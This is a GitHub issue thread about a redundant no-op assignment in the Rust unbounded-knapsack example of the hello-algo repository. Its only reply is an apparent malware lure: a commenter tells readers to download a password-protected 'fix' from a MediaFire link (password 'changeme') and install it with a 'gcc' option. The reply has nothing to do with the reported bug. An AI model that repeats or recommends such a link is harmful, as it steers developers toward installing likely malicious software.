### ISSUE TITLE
no op assignment in dp

### ISSUE THREAD

**Issue by diucicd** [krahets/hello-algo#1494]
https://github.com/krahets/hello-algo/blob/2cd2a94ce673abf80ce2421587cf4a7873396e24/codes/rust/chapter_dynamic_programming/unbounded_knapsack.rs#L37

![image](https://github.com/user-attachments/assets/aa3a5b2c-c664-4576-9101-abf61f02613b)

when prev row and current row are just using the same vector, this is actually a noop operation, so this line can be ommited and I see this in other language as well. If you like I can make a pr to fix this.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
